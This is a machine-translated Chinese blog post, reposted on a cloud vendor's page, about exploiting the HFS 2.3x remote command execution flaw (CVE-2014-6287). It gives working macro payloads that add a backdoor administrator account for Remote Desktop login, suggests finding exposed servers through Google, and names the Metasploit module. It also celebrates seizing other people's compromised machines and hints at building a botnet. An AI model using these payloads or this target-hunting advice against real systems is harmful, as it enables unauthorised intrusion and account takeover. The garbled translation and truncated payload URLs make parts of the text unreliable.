Review HFS 2.3x remote command execution, catch chicken hack "Doomsday" (cve2014-6287)

Source: Internet
Author: User
Tags cve

Last year HFS 2.3x remote command execution let a lot of people suffer, especially some hackers, because many of the bulk of chicken-breeding hackers love to use it, so, hard to catch the broiler to share with people. We analyzed the vulnerability and learned that the problem of regular expressions led to the execution of remote code.

Let's test the power of this vulnerability locally, why did you mention it over the next six months? Because today casually search, with this version of the domestic there are many, involving some "catch the Chicken Hack" (now still in this version of the estimate is a side dish), schools and so on. Interestingly, the server with HFS is generally turned on 3389, evil ah. Such as.

More hosts can be found on Google.

650) this.width=650; "title=" hfs01.jpg "style=" Float:none "alt=" wkiom1t3byxjnfdtaake7zoadsc024.jpg "src=" http:/ "/>

Test a few, most of the 3389 ports open. Causes the server to be very insecure.

650) this.width=650; "title=" hfs02.jpg "style=" Float:none "alt=" wkiol1t3bpudt0whaaf2anh6-fe569.jpg "src=" http:/ "/>

Below we test on the local virtual machine to simulate a "catch a chicken Hacker" host. Visit the destination URL, found there is a muma.exe, usually used to hang the net horse. The example is adapted from a real case.

650) this.width=650; "title=" hfs03.jpg "alt=" wkiom1t3bpprz3jlaahag0d4w3q598.jpg "src=" M01/5a/20/wkiom1t3bpprz3jlaahag0d4w3q598.jpg "/>

You can then use the following exp to add an administrator account to the target host and then log on remotely.{.exec|cmd.exe/c net user zerosecurity 12345/add.}

HTTP://{.EXEC|CMD.EXE/C net localgroup administrators Zerosecurity/add.}

TIP: Some versions of search are not in front of you, try the search box yourself when using.

After logging into Remote Desktop, you can see that the administrator account was successfully added.

650) this.width=650; "title=" hfs04.jpg "alt=" wkiol1t3cz6acnr5aahh1f4t1hm581.jpg "src=" M01/5a/1d/wkiol1t3cz6acnr5aahh1f4t1hm581.jpg "/>

At the same time we can see that the "hacker" of the broiler also fell into our hands.

650) this.width=650; "title=" hfs05.jpg "alt=" wkiom1t3cwlrs0ceaaq50lxgr5q872.jpg "src=" M01/5a/20/wkiom1t3cwlrs0ceaaq50lxgr5q872.jpg "/>

Metasploit also has the corresponding exp module, here do not elaborate, interested friends can try it yourself.

Using modules: exploit/windows/http/rejetto_hfs_exec
Impact Version: HFS 2.37
Trigger platform: Windows

Exp Download: Dot Me dot Me

What the? You want to build your own chicken farm, too? I'll talk about it later.

This article is from the "Nocturnal Person" blog, so be sure to keep this source

Review HFS 2.3x remote command execution, catch chicken hack "Doomsday" (cve2014-6287)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.